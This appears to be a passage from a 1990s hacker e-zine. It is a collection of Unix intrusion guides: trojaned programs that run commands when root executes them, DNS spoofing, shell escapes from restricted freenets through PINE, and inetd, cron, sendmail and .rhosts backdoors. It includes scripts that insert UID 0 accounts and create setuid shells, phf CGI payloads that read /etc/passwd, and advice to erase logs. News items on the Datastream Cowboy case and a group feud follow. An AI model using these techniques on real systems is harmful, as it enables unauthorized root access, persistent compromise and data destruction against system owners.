holes in some programs involves placing symbolic links into a spool directory. NAIAD will help locate links in unexpected places. * Lists old files whose inode has been altered recently. Some malicious programs attempt to hide the fact that they have altered a file by using the "utime" system call to alter the "last modified" time of the file. The inode also contains the "inode changed" time, which is not modifiable by this call; thus a file which has been tampered to display an old modification time will still have a recent "inode changed" time. Of course, this can also be caused by someone using the "chmod" command. There are two parameters associated with this: the "window" is the amount of time within which the modification times may differ without being flagged, (default is 30 minutes, which can be changed); and "cutoff", which is the time within which the inode must have been modified for the file to have been flagged (default is to not show files whose inodes have not been modified in the last week, which can be changed). * Lists device files which are not under the /dev hierarchy, or ordinary files that are. * Lists any files or directories whose mtime, atime or ctime are later than the current system time. * Lists files which contain user-specified search-strings. This is similar to the command: find . -exec grep '{}' ';' -print but a little more efficient because there isn't a process started for each file, and naiad can be made to search only part of each file. The output format is: MMM mmm iiiiiiiiii xxxxxxxxxxxxx: "" ...where "MMM" is the major device number, "mmm" is the minor device number, "iiiiiiiii" is the inode number, "xxxxxxxxxxx" is a comment, and "" is the pathname of the file. There may be additional information appended to the line. You will probably want to run as super-user so that NAIAD can access the entire file system. It is passive, and will not alter anything it finds. More detailed information may be found in the "naiad.1" file, which is part of the naiad tarfile. ---These Are The *EXACT* Files Taken From The nasa.zip.gz I have--------------- So, looks as if NASA has some pretty neato detection juarez to use, I wouldn't advise anyone to hack any *.nasa.gov system without knowing how to obtain root and having mad skills to counter-act these security measures, you have been warned. so1o. 3. Rooting From Bin : so1o This is something I was thinking alot about the other day, I was on a System V Release 4, I had just performed the chkperm exploit, which only gives bin access (uid=1 and gid=1) to the system, so even though I own all the files in the /bin/ directory, I am still not root. Here is a very very simple technique I developed for such occasions, this may come in useful one day for someone, somewhere... Write a program that you can get people to run, you could get hold of the source for a common program, such as su or who or mount. Put this line in it somewhere: if ( !strcmp(getlogin(),"root") ) system("whatever you want"); This checks to see if the root login is running your program. If he is, you can have him execute any shell command you'd like. Here are some suggestions: "chmod 666 /etc/passwd" /etc/passwd is the system's password file. The root owns this file. Normally, everyone can read it (the passwords are encrypted) but only the root can write to it. Take a look at it and see how it's formatted if you don't know already. This command makes it possible for you to now write to the file - i.e. create unlimited accounts for yourself and your friends. "chmod 666 /etc/group" By adding yourelf to some high-access groups, you can open many doors. "chmod 666 /usr/lib/uucp/L.sys" Look for this file on your system if it is on the uucp net. It contains dialups and passwords to other systems on the net, and normally only the uucp administrator can read it. Find out who owns this file and get him to unknowingly execute a program to unlock it for you. "rm /etc/passwd" If you can get the root to execute this command, the system's passwd file will be removed and the system will go down and will not come up for some time to come. This is very destructive and evil, but pointless, if you do want to damage a system, at least use your imagination. If you are going to go about adding a trojan horse program to the system, there are some rules you should follow. If the hidden purpose is something major (such as unlocking the user's mbox or deleting all of his files or something) this program shouldn't be a program that people will be running a lot (such as a popular computer game) - once people discover that their files are public access the source of the problem will be discovered quite easily. Save this purpose for a 'test' program (such as a game you're in the process of writing) that you ask individual people to run via mail or 'chatting' with them. As I said, this 'test' program can bomb or print a phony error message after completing its task, and you will just tell the person "well, I guess it needs more work", wait until they log off, and then read whatever file of theirs that you've unlocked. If your trojan horse program's sole purpose is to catch a specific user running it - such as the root or other high-powered user - you can put the code to do so in a program that will be run a lot by various users of the system. Your modification will remain dormant until he runs it. If you cant find the source to 'star trek' or whatever in C, just learn C and convert something from pascal. It can't hurt to learn C as it's a great language. We've just seen what it can do on a UNIX system. Once you've caught the root (i.e. you can now modify the /etc/passwd file) remove the spurious code from your trojan horse program and you'll never be caught. so1o. 4. DNS Spoofing : so1o You can now use a new DNS spoofing technique originally developed by johan, I have seen this technique often applied to IRC, and prym was one of the first to use the technique for that purpose. Here is a basic introduction into the DNS concept. -------------------------------------------------- DNS stands for Domain Name Server although you may hear it refered to as Dynamic Name Server. DNS servers are used so that instead of everyone having numeric IP's for their websites and shit, they can use a DNS so that a client can 'lookup' the name (eatme.com for example) to the numeric IP. Basically, a DNS server is a computer which is running a nameserver daemon typically listening on UDP port 53. When a new domain is setup the domain is registered with Internic. Internic then tells its clients who has authority over the domains registered with it. For example say 1.2.3.4 wanted to resolve the address for peachie.com and 1.2.3.4's nameserver was 1.3.3.7. 1.2.3.4 would ask 1.3.3.7 what the numeric IP for peachie.com was, so 1.3.3.7 would ask internic who had authority over peachie.com and internic might reply with ns.peachie.com. So then 1.3.3.7 would ask ns.peachie.com what the numeric IP for peachie.com was. Then ns.peachie.com would tell 1.3.3.7 that the numeric IP for peachie.com was 4.3.2.1 and then 1.3.3.7 would then tell 1.2.3.4 the numeric IP and the name would be resolved. DNS servers generally cache addresses that are looked up by its clients. So if 1.2.3.4 were to ask 1.3.3.7 what the address for taco.com was again, 1.3.3.7 would not ask Internic etc. instead it would take the IP that it had previously resolved earlier and say that the numeric IP for peachie.com is 4.3.2.1. the funny part is that the DNS server doesn't do alot of checking when another nameserver replies to its query. It basically just tells the client what is was told at an earlier point and caches it in the same way. This is why we can spoof using such a technique, but we would need root access to a nameserver first, this is one of the biggest setbacks... How to spoof your DNS. ---------------------- Lets say were sitting on ns.peachie.com with root, and we have authority for all of peachie.com. we want to cache our boxs address 2.2.2.2 on the remote nameserver ns.eatme.org so that we can connect to eatme.org with the address of trusted.eatme.org. We could write a program that listens for DNS queries and replies with false information. sitting on ns.peachie.com we could lookup peachie.com on the nameserver ns.eatme.org. ns.eatme.org would ask Internic who had authority for peachie.com and it would reply to ns.eatme.org that ns.peachie.com had authority over peachie.com. Then ns.eatme.org would ask ns.peachie.com what the address for peachie.com was. If we were running a normal DNS then it would tell ns.eatme.org that the address for peachie.com was 4.3.2.1. but we aren't. We'll say that ns.peachie.com tells ns.eatme.org that the reverse of 2.2.2.2 is trusted.peachie.com and the address for trusted.peachie.com is 2.2.2.2. This exploits the failure to check a few things on the DNS. Basically ns.eatme.org asked what the numeric IP for peachie.com was and we told it that the reverse of 2.2.2.2 is trusted.eatme.org and that the IP of trusted.eatme.org is 2.2.2.2. They asked a question to which we responded with two awnsers to different question entirely. Now we would simply connect to eatme.org from 2.2.2.2 and eatme.org would ask ns.eatme.org for the reverse of 2.2.2.2 and in its cache it would find trusted.eatme.org and it would reply with that answer. Then it would ask for the address of trusted.eatme.org and it would reply with 2.2.2.2. you would then be connected to eatme.org from trusted.eatme.org and in effect DNS spoofing. That's all there is to it, it may be a bit heavy for some people. so1o 5. FreeNet : TrN Breaking security on restricted shells and freenets. What many system administrators fail to realize is that by setting up shells and security on their applications and systems, and generally trying to lock users in a freenet menu environment, it is almost impossible to fully examine every program. Many programs allow you to escape to shells, even in secure mode, especially the older ones. There is a longstanding bug in the gohper application, used by many freenets, that allows you to start up a gopher server, where an entry is created such as ";sh". Following this entry provides a shell. This is the main reason why the original gopher client is no longer in use. A "l;rm -rf *" was just as easy. In todays world, the biggest problem is that freenets usually allow you to edit files. If this is the case, you almost have a 100% chance of you getting into a real shell. What you first have to do is see if you can go through the menu system to edit a file. If you can't that is cool too. We are going to show you how to get a shell out of PINE. It doesn't matter which version, this works all the way up to 3.96. Anyway, like I was saying, you should see if you can either a) edit a file, or b) upload a file. I'm almost sure you can do either. So, lets start a little session here. First, you have to edit your .pinerc. If you can't, download it (or get it from the PINE package), make the changes, and reupload it. What is important is that you edit the feature-list=commands, and have it read something similar to this: feature-list=enable-alternate-editor-cmd, enable-unix-pipe-cmd After setting this correctly, go further in the file, and until you find the editor= command. It is stated that the editor is normally set to sh, and invoked via _^ [Control-Shift-Dash]. Do you get the idea yet? Set the line to read editor=sh and then save the file. Now for the fun part. Start up pine, and chose Compose Message. Erase all the To/Cc/Att/Sub headers, and make the message text blank, except for the work "sh" (without the quotes) on a single line. After this is done, press the alternate editor hotkey (^_). Here is what happens: To : Cc : Attchmnt: Subject : ----- Message Text ----- sh $ Kinda neat. That little $ is the sign that it all worked. What you probably want to do is execute some of the standard commands that tell you a little about where you are: $ uname -a ; uptime ; /sbin/ifconfig -a SunOS pb 4.1.3_U1 1 sun4m 12:14am up 47 days, 12:18, 24 users, load average: 2.71 le0: flags=63 inet 199.227.192.35 ffffff00 199.227.192.0 lo0: flags=49 inet 127.0.0.1 ff000000 Then a w ; ps -aux would be nice. It can tell you a little about what is going on, and what is safe to do the things you want. You should probably log on late at night, compile slirp if it is only a shell/vt dialin, and then check the system for vunerabilities, unshadowed passwords, etc. I've notified my freenet of their problems, but they don't seem to care. Maybe now they will. Ok sysadmins, fix up your freenets, and hackers... Hack the planet. :-) This article by TrN of The CodeZero. I'll have more interesting information on the way. You can get ahold of me at http://bluebox.dyn.ml.org:8000, or by e-mail at p033644b@pbfreenet.seflin.lib.fl.us. You should check out the web page, as it has other security related information. LaterZ. One other thing to consider, if ports 514 / 512 are open, then you can try creating an .rhosts file in your home directory containing "+ +", then use.. rsh -l loginhere systemhere.com csh -i ...and you will get a shell -- so1o 6. Backdoors Revised : Blk-Majik Disclamer: If you do anything mentioned in this article, it is your own fault and any trouble you manage to get into is your own responsibility, not mine. But what am I thinking...like any of you lamers can root a shell :). gr33tz: A big wuzzup to cf, oK, oa, and gZ! Keep it kewl, madmax, imunknown, pack, plum, mogle, crytpo`, so1o, c0d, and da rest of muh boys! Thanx to mcooly for making this document possible and helping me out! ============================================================================= section 1: ============================================================================= What is a back door? : Well, kiddies, a backdoor is just a way to remotely get into a shell without being noticed or sometimes logged. This can be done by adding a extra telnet port to the server I will show you a few ways to set up the port, and also how to keep it up even after the admin find it. so1o had a section in a back issue with a back door using the inetd.conf file where you had to end all commands with a ";". Well that annoyed the hell out of me so I have modified his technique. ============================================================================= section 2: ============================================================================= What you need : Basically, you need root on a shell to start (and a Unix based OS). After that, you will need a good editor....say pico or vi. Most of you #shells wh0res need, but lack this important ingredient....a fucking brain. ============================================================================= section 3: ============================================================================= Understanding the technique : After you checked your head, editor, whoami, etc, you are all set. Ok, this is what you look for: /etc/services This file lets you find a port /ect/inetd.conf This is where the backdoor will be ok, in the /etc/services file, you will see something like this: tcpmux 1/tcp #TCP Port Service Multiplexer tcpmux 1/udp #TCP Port Service Multiplexer compressnet 2/tcp #Management Utility compressnet 2/udp #Management Utility compressnet 3/tcp #Compression Process compressnet 3/udp #Compression Process ok, what the fuck is that? ill explain it with this example: ftp 21/tcp #File Transfer [Control] ftp 21/udp #File Transfer [Control] [1] [2]/[3] #[ 4 ] 1: The name of the service of the system. 2: The port that the system uses for the service. 3: The protocol (going to be tcp. You can chose either tcp or udp.) 4: A description of what the service is used for. Aight, thats the service file...you will need this later. now look at the /etc/inetd.conf file. the inetd is a Internet daemon that will listen for tcp requests and UDP prots and then spaws the program when a connection request is made. It will look like this: ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A telnet stream tcp nowait root /usr/libexec/tcpd telnetd shell stream tcp nowait root /usr/libexec/tcpd rshd login stream tcp nowait root /usr/libexec/tcpd rlogind -a exec stream tcp nowait root /usr/libexec/tcpd rexecd let me explain it: ftp stream tcp nowait root /usr/libexec/tcpd ftpd -l -A [1] [ 2 ] [3] [ 4 ] [ 5 ] [ 6 ] [ 7 ] 1: Name of deamon in the services file. It tells inetd what to look for in /etc/services to see what port to use when connecting. 2: Type of of socket connection that the deamon will accept. 3: Protocol field which is always TCP or UDP. 4: How long to delay connection. 5: User to run on the deamon as (used with uid/gid permissions etc.) 6: What program will keep the connection. 7: The actual command or daemon. Ok, so what that dose it makes a port for telnet (port 21, as defined in the services file). It has a stream/tcp connection and dosn't wait for a prompt. The user is of root access and uses /ur/libexec/tcpd (but limited commands) Ok, now u know what the shit is for, next step... ============================================================================= section 4: ============================================================================= Installing the backdoor : Backdoor I : Using /etc/inetd.conf and /etc/services ---------------------------------------------------- method 1 : ---------- ok, now go back to the /etc/services file. Look at it and find a service you think the admin will not notice, and that is not in use. remember the name of the service. Now, go to the inetd.conf file. Go to a place with all the services name where the 1 is in the above example. Add you service somewhere so it is hidden within others. For 2, put the port of the service. 3 is tcp, duh. 4 is nowait. 5 will be root, so u get root access. 6 is going to be /bin/sh or what ever you like. 7 has to be 6 -i..ex: if 7 is /bin/sh, 7 is /bin/sh -i here is an example: ftp stream tcp nowait root /bin/sh sh -i Ok, now you have to restart the inetd. do this by typing (as root) : killall -HUP inetd Ok, now lets test it. From a different system... telnet victum.server.com 21 Trying 123.456.78.9... Connected to comp.com Escape character is '^]'. bash# bash# whoami root bash# tip: do NOT use the ftp port...it is just used to often. Pick a service that is not use alot. It will help you keep the backdoor running. method 2: --------- If you are willing, you can add your own service to the service file. This is easy..say you service file is like this: netbios-ssn 139/tcp nbssn imap 143/tcp # imap network mail protocol NeWS 144/tcp news # Window System snmp 161/udp ok, look at the ports.....see how they skip a few? well lets fill 1 of them up... netbios-ssn 139/tcp nbssn suled 142/tcp suled imap 143/tcp # imap network mail protocol NeWS 144/tcp news # Window System snmp 161/udp Notice the suled service...that I added that to the /etc/services. Ok, now to the /etc/inetd.conf file: ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd gopher stream tcp nowait root /usr/sbin/tcpd gn ...Here we go!! ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd -l -a telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd gopher stream tcp nowait root /usr/sbin/tcpd gn suled stream tcp nowait root /bin/sh sh -i Ok, now restart inetd like i said how to before... You're all set, telnet localhost and test it!@~# Backdoor II: Da beauty of CRON ------------------------------- Ok, cron trojans are good for keeping root if the admin kills the backdoor. A Cron is a timed daemon. It consits of hours, minutes, etc. It will make the system automatically issue a command on the shell at a given time of your choice... Type crontab in the shell. It will tell you how to list, run and remove crons. You will like to look at the /var/spool/cron/crontabs/root. This is what the crons will look like: 0 0 * * 1 /usr/bin/updatedb [1] [2] [3] [4] [5] [ 6 ] 1: munute, 0-59 2: hour, 0-23 3: day of month, 1-31 4: month of yeat, 1-12 5: day of week, 0-6 6: command to execute The example above is issued on monday's. If you want to exploit the cron, simply add an cron line to the /var/spool/crontab/root. ie: If you use the UID 0 account (as seen later), you can make a cron to see if the UID 0 account is still alive. If root killed it, the cron can re-add it! ...This will make the UID 0 account, just for back-up: Cron #1 ------- newuser.sh ---------- #!/bin/sh # Inserts a UID 0 account into the middle of the passwd file. # There is likely a way to do this in 1/2 a line of AWK or SED. Oh well. # daemon9@netcom.com set linecount = `wc -l /etc/passwd` cd # Do this at home. cp /etc/passwd ./temppass # Safety first. echo passwd file has $linecount[1] lines. @ linecount[1] /= 2 @ linecount[1] += 1 # we only want 2 temp files echo Creating two files, $linecount[1] lines each \(or approximately that\). split -$linecount[1] ./temppass # passwd string optional echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa cat ./xab >> ./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa* ./temppass echo Done... *** NOTE : MODIFY THE ECHO "YOURUSER..." PART!! Here is a script that kinda does the same thing, but instead of making a new account, it will look for an old, disabled account and enable it just for you : dead.sh ------- #!/bin/sh # Everyone's favorite... cp /bin/csh /tmp/.yourlittleshell # Don't name it that... chmod 4755 /tmp/.yourlittleshell Ok, here is where the cron comes in. It will look in the passwd files to check if you YouUser is still alive. If not, it brings him back! revive.sh --------- #!/bin/sh #Is YourUser still on the system? Let's make sure he is. #daemon9@netcom.com set evilflag = (`grep eviluser /etc/passwd`) if($#evilflag == 0) then # Is he there? set linecount = `wc -l /etc/passwd` cd # Do this at home. cp /etc/passwd ./temppass # Safety first. @ linecount[1] /= 2 @ linecount[1] += 1 # we only want 2 temp files split -$linecount[1] ./temppass # passwd string option echo "YourUser::0:0:Mr. Hacker:/home/hacker:/bin/csh" >> ./xaa cat ./xab >> ./xaa mv ./xaa /etc/passwd chmod 644 /etc/passwd # or whatever it was beforehand rm ./xa* ./temppass echo Done... else endif cron #2 ------- First of all, you will need a copy of the /etc/passwd file in a hidden location. For this example, we will use /var/spool/mail/.hidepass. We have one entry in it that will be are root account we will use. Then lets make a cron that will save a copy of the real /etc/passwd file and install the hidden passwd file as the real one for 1 minute at a time of your choice. Make it at a slow time of day because any one who tries to access the passwd file durring this minute will get an error. 4:30 am is a good time. Put this in the roots cron to do this : 29 4 * * * /bin/usr/hidenhidenpass ..make sure this exist #echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.hidden here is the /bin/usr/hidenhidenpass .hidden ------- #!/bin/sh # Install trojan /etc/passwd file for one minute #daemon9@netcom.com cp /etc/passwd /etc/.temppass cp /var/spool/mail/.sneaky /etc/passwd sleep 60 mv /etc/.temppass /etc/passwd Cron #3 -------- This is a c script that will work like the above. Cron it as root like as above and just let this file load every day. hidden.c -------- #include #define KEYWORD "industry3" #define BUFFERSIZE 10 int main(argc, argv) int argc; char *argv[];{ int i=0; if(argv[1]){ /* we've got an argument, is it the keyword? */ if(!(strcmp(KEYWORD,argv[1]))){ /* This is the trojan part. */ system("cp /bin/csh /bin/.swp121"); system("chown root /bin/.swp121"); system("chmod 4755 /bin/.swp121"); } } /* Put your possibly system specific trojan messages here */ /* Let's look like we're doing something... */ printf("Sychronizing bitmap image records."); /* system("ls -alR / >& /dev/null > /dev/null&"); */ for(;i<10;i++){ fprintf(stderr,"."); sleep(1); } printf("\nDone.\n"); return(0); } /* End main */ ============================================================================= section 5: ============================================================================= Sendmail backdoor : ------------------- With this, you have to edit the /etc/aliases file. add this line: decode: |/usr/bin/uudecode make sure u hide it in their so it aint odvious :). the uudecode file will be a .rhosts file with the full pathname embedded. here is the script: uudecode.sh ----------- #!/bin/sh # Create our .rhosts file. Note this will output to stdout. echo "+ +" > tmpfile /usr/bin/uuencode tmpfile /root/.rhosts Ok, now telnet to victumserver.com at port 25. Fakemail to decode and use as the subject body, the uuencoded version of the .rhosts file. Here is an easy one (but not fake): echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@victimserver.com You can add any program that I have listed to be ran from the alias, so be as creative as u want! :) ============================================================================= section 6: ============================================================================= Others : Here is one of the best trojans I have seen. It is sneeky and only detectable by programs like tripwire. All you have to do is put the trojan code into a the source of some popular system programs. su, login, and passwd are very good to add it to because they run a SUID root and don't have strict permission so you can modify it. This will tell you what to do after u get the source code for the particular UNIX system you are backdooring. If you can't get the source for any programs on your system, u may be screwed :(. You can find trojaned versions of many programs, here is a small example of pseudo-code that is added in such programs... get input; if input is special hardcoded flag, spawn evil trojan; else if input is valid, continue; else quit with error; ... ============================================================================= section 7: ============================================================================= Keeping the backdoor : Well, the best advice I can possibly give to start off is to cover your tracks. If the admin doesn't know he's been hacked, he won't look for backdoors to remove. This will totaly depend on the admins ability to find backdoors and know how to get rid of them. 7. One Last Thing About The Infamous pHf Technique : so1o You can use this basic form of attack...[Thru NutScrape For Example] http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd [ 1 ][ 2 ][ 3 ][ 4 ][5][ 6 ] 1: The Target Site. 2: The pHf Command. 3: The Magic pHf Arguments. 4: The Program You Wish To Run. 5: %20 Is A Space, so %20%20%20 == 3 Spaces. 6: The Arguments You Wish To Use. Here Are Some Other Examples... ------------------------------- http://www.site.com/cgi-bin/phf?Qalias=x&0a/bin/ls%20-la%20/etc/ ...This will list the files in the /etc/ directory. http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/uname%20-a ...This will display the operating system. Remember : You execute the commands with pHf as the user nobody, so you can't shutdown the system, echo "+ +" >> /.rhosts etc. etc. All the stuff you throw at the system using phf will be logged too, so if you do decide to hack the system, remember to kill the logs when you get root :) =============================================================================== ==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]== =============================================================================== 1. Some History : nobody Electronic doom will soon be visited on U.S. computer networks by information warriors, hackers, pannational groups of computer-wielding religious extremists, possible agents of Libya and Iran, international thugs and money-mad Internet savvy thieves. John Deutch, director of Central Intelligence, testified to the truth of the matter, so it must be graven in stone. In a long statement composed in the august tone of the Cold Warrior, Deutch said to the Senate Permanent Subcommittee on Investigations on June 25, "My greatest concern is that hackers, terrorist organizations, or other nations might use information warfare techniques" to disrupt the national infrastructure. The lack of solid evidence for any of the claims made by the intelligence community has created an unusual stage on which two British hackers, Datastream Cowboy and Kuji, were made the dog and pony in a ridiculous show to demonstrate the threat of information warfare to members of Congress. Because of a break-in at an Air Force facility in Rome, NY, in 1994, booth hackers were made the stars of two Government Accounting Office reports on network intrusions in the Department of Defense earlier this year. The comings and goings of Datastream Cowboy also constitute the meat of Gelber and Christy's minority staff report from the Subcommittee on Investigations. Before delving into it in detail, it's interesting to read what a British newspaper published about Datastream Cowboy, a sixteen year-old, about a year before he was made the poster boy for information warfare and international hacking conspiracies in front of Congress. In a brief article, blessedly so in contrast to the reams of propaganda published on the incident for Congress, the July 5 1995 edition of The Independent wrote, "[Datastream Cowboy] appeared before Bow Street magistrates yesterday charged with unlawfully gaining access to a series of American defense computers. Richard Pryce, who was 16 at the time of the alleged offences, is accused of accessing key US Air Force systems and a network owned by Lockheed, the missile and aircraft manufacturers." Pryce, a resident of a northwest suburb of London did not enter a plea on any of 12 charges levied against him under the British Computer Misuse Act. He was arrested on May 12, 1994, by New Scotland Yard as a result of work by the U.S. Air Force Office of Special Investigations. The Times of London reported when police came for Pryce, they found him at his PC on the third floor of his family's house. Knowing he was about to be arrested, he "curled up on the floor and cried." In Gelber and Christy's staff report, the tracking of Pryce, and to a lesser extent a collaborator called Kuji -- real name Mathew Bevan, is retold as an eight page appendix entitled "The Case Study: Rome Laboratory, Griffiss Air Force Base, NY Intrusion." Pryce's entry into Air Force computers was noticed on March 28, 1994, when personnel discovered a sniffer program he had installed on one of the Air Force systems in Rome. The Defense Information System Agency (DISA) was notified. DISA subsequently called the Air Force Office of Special Investigations (AFOSI) at the Air Force Information Warfare Center in San Antonio, Texas. AFOSI then sent a team to Rome to appraise the break-in, secure the system and trace those responsible. During the process, the AFOSI team discovered Datastream Cowboy had entered the Rome Air Force computers for the first time on March 25, according to the report. Passwords had been compromised, electronic mail read and deleted and unclassified "battlefield simulation" data copied off the facility. The Rome network was also used as a staging area for penetration of other systems on the Internet. AFOSI investigators initially traced the break-in back one step to the New York City provider, Mindvox. According to the Congressional report, this put the NYC provider under suspicion because "newspaper articles" said Mindvox's computer security was furnished by two "former Legion of Doom members." "The Legion of Doom is a loose-knit computer hacker group which had several members convicted for intrusions into corporate telephone switches in 1990 and 1991," wrote Gelber and Christy. AFOSI then got permission to begin monitoring -- the equivalent of wiretapping -- all communications on the Air Force network. Limited observation of other Internet providers being used during the break-in was conducted from the Rome facilities. Monitoring told the investigators the handles of hackers involved in the Rome break-in were Datastream Cowboy and Kuji. Since the monitoring was of limited value in determining the whereabouts of Datastream Cowboy and Kuji, AFOSI resorted to "their human intelligence network of informants, i.e., stool pigeons, that 'surf the Internet.' Gossip from one AFOSI 'Net stoolie uncovered that Datastream Cowboy was from Britain. The anonymous source said he had e-mail correspondence with Datastream Cowboy in which the hacker said he was a 16-year old living in England who enjoyed penetrating ".MIL" systems. Datastream Cowboy also apparently ran a bulletin board system and gave the telephone number to the AFOSI source. The Air Force team contacted New Scotland Yard and the British law enforcement agency identified the residence, the home of Richard Pryce, which corresponded to Datastream Cowboy's system phone number. English authorities began observing Pryce's phone calls and noticed he was making fraudulent use of British Telecom. In addition, whenever intrusions at the Air Force network in Rome occurred, Pryce's number was seen to be making illegal calls out of Britain. Pryce travelled everywhere on the Internet, going through South America, multiple countries in Europe and Mexico, occasionally entering the Rome network. From Air Force computers, he would enter systems at Jet Propulsion Laboratory in Pasadena, California, and the Goddard Space Flight Center in Greenbelt, Maryland. Since Pryce was capturing the logins and passwords of the Air Force networks in Rome, he was then able to get into the home systems of Rome network users, defense contractors like Lockheed. By mid-April of 1994 the Air Force was monitoring other systems being used by the British hackers. On the 14th of the month, Kuji logged on to the Goddard Space Center from a system in Latvia and copied data from it to the Baltic country. According to Gelber's report, the AFOSI investigators assumed the worst, that it was a sign that someone in an eastern European country was making a grab for sensitive information. They broke the connection but not before Kuji had copied files off the Goddard system. As it turned out, the Latvian computer was just another system the British hackers were using as a stepping stone; Pryce had also used it to cover his tracks when penetrating networks at Wright-Patterson Air Force Base in Ohio, via an intermediate system in Seattle, cyberspace.com. The next day, Kuji was again observed trying to probe various systems at NATO in Brussels and The Hague as well as Wright-Patterson. On the 19th, Pryce successfully returned to NATO systems in The Hague through Mindvox. The point Gelber and Christy seem to be trying to make is that Kuji, a 21-year old, was coaching Pryce during some of his attacks on various systems. By this point, New Scotland Yard had a search warrant for Pryce with the plan being to swoop down on him the next time he accessed the Air Force network in Rome. In April, Pryce penetrated a system on the Korean peninsula and copied material off a facility called the Korean Atomic Research Institute to an Air Force computer in Rome. At the time, the investigators had no idea whether the system was in North or South Korea. The impression created is one of hysteria and confusion at Rome. There was fear that the system, if in North Korea, would trigger an international incident, with the hack interpreted as an "aggressive act of war." The system turned out to be in South Korea. During the Korean break-in, New Scotland Yard could have intervened and arrested Pryce. However, for unknown reasons, the agency did not. Those with good memories may recall mainstream news reports concerning Pryce's hack, which was cast as an entry into sensitive North Korean networks. It's worth noting that while the story was portrayed as the work of an anonymous hacker, both the U.S. government and New Scotland Yard knew who the perpetrator was. Further, according to Gelber's report English authorities already had a search warrant for Pryce's house. Finally, on May 12 British authorities pounced. Pryce was arrested and his residence searched. He crumbled, according to the Times of London, and began to cry. Gelber and Christy write that Pryce promptly admitted to the Air Force break-ins as well as others. Pryce confessed he had copied a large program that used artificial intelligence to construct theoretical Air Orders of Battle from an Air Force computer to Mindvox and left it there because of its great size, 3-4 megabytes. Pryce paid for his Internet service with a fraudulent credit card number. At the time, the investigators were unable to find out the name and whereabouts of Kuji. A lead to an Australian underground bulletin board system failed to pan out. On June 23 of this year, Reuters reported that Kuji -- 21-year-old Mathew Bevan -- a computer technician, had been arrested and charged in connection with the 1994 Air Force break-ins in Rome. Rocker Tom Petty sang that even the losers get lucky some time. He wasn't thinking of British computer hackers but no better words could be used to describe the two Englishmen and a two year old chain of events that led to fame as international computer terrorists in front of Congress at the beginning of the summer of 1996. Lacking much evidence for the case of conspiratorial computer-waged campaigns of terror and chaos against the U.S., the makers of Congressional reports resorted to telling the same story over and over, three times in the space of the hearings on the subject. One envisions U.S. Congressmen too stupid or apathetic to complain, "Hey, didn't we get that yesterday, and the day before?" Pryce and Bevan appeared in "Security in Cyberspace" and twice in Government Accounting Office reports AIMD-96-84 and T-AIMD96-92. Jim Christy, the co-author of "Security in Cyberspace" and the Air Force Office of Special Investigations' source for the Pryce case supplied the same tale for Jack Brock, author of the GAO reports. Brock writes, ". . . Air Force officials told us that at least one of the hackers may have been working for a foreign country interested in obtaining military research data or areas in which the Air Force was conducting advanced research." It was, apparently, more wishful thinking. This years UK hacking conference : Access All Areas. http://www.access.org.uk July 5th. 2. [GUNNAR], MadSeason and sIn : so1o Some dudes called MadSeason and [GUNNAR] has been proving sIn's true lameness and logging it all at the same time, phear elite logging skills... ################################################################################## # # # Darkfool # # (What a Fool/The PHF hacker) # # BY [GUNNAR] # # # ################################################################################## Ever read a hacking txt by this guy? Ever realize just how useless the information his txt's are? Nothing in his txt files aren't covered in a hundred text files written before which better explain hacking techniques. Like a quote from my pal MadSeason goes: "The fact is these txt files about hacking and phreaking are written by people with minimal knowledge. Then you have some newbie who comes along wanting to be some hacker god and reads a few files and has even less of a clue then the writer had about the subject, then goes around spewing out bullshit and claiming they are a hacker and/or phreaker, just an endless circle of ignorance." That quote is so true. All these hack txt's realeased by these groups like S.I.N. and Techonophoria are just crap. About the only exploit that Darkfool knows the the PHF bug found in older versions of NCSA and Apache httpd. This bug is very well know(And over exploited might I add.). Do a search for ac.jp or edu.au domains, and adding to the address "cgi-bin/phf?Qalias=x%0a/bin/cat%20 /etc/passwd" is neither impressive nor is it even hacking. It's a lame excuse for hacking. Darkfool claims many things that he doesn't know. For instance, take pascal programming. He claims to know it, but when asked a single question on it by, Scorpion(MadSeason), he cannot answer. Here is a little something: [13:53] How many parameters do Cluster object constructors take in pascal, DF? [13:53] i have no idea scorpion [13:54] I thought you knew Pascal [13:54] i am learning it at college There is a big difference between knowing and learning. I guess Darkfool doesn't realize that. It's all a part of trying to sound and seem "elite". Which Darkfool is far from being. Seems as thought Darkfool and the rest of his S.I.N. pals are compying MadSeason and myself, and questioning peoples abilities. It's funny though, when MadSeason and I got to #sin questioning them, we get kicked for making them look stupid. And when they as us something, and it doesn't go quite as they planned it. Look what they do... [14:14] *** Now talking in #sin [14:15] hey [14:15] how do i kill all jobs running on a shell ? <[GUNNAR]> Well hello there! [14:15] hey <[GUNNAR]> kill -9 PID <[GUNNAR]> If you really wanna kill it. <[GUNNAR]> Boo Hoo. <[GUNNAR]> Damn, that one didn't go well for you did it? <[GUNNAR]> BTW, use the ps command to get the PID. <[GUNNAR]> la la la la... [14:17] *** Sinning sets mode: +b *!*@*.wco.com [14:17] *** You were kicked by Fa|lur3 (banned) In short, Darkfool, S.I.N. and the rest like him are really just wannabes trying to sound big and bad. Nothing wrong with groups or people who actually hack. But, when you have a group like S.I.N. who's members claim more than they know, it is truely sad. I myself and no great hacker(I'm not a hack. Plain and simple.) nor am I some s00per programmer. But the thing is, I do not claim more than I actually know. This is obviously not how Darkfool thinks of things. He wants to be known as a s00per hacker, which he is not. I'm writing this so you(The Readers) don't buy into this bullshit and be misled by people like Darkfool and the group he is in S.I.N.! They are truely sad people. What a shame I have brought out the truth! I think more is somewhere on http://www.ilf.net/teknopia/ 3. "Welcome to the [D]epartment of [O]wned [E]nergy" : so1o The http://www.doe.ca (Canadian Dept. of Energy) was changed last weekend...

Welcome To The [D]epartment of [O]wned [E]nergy


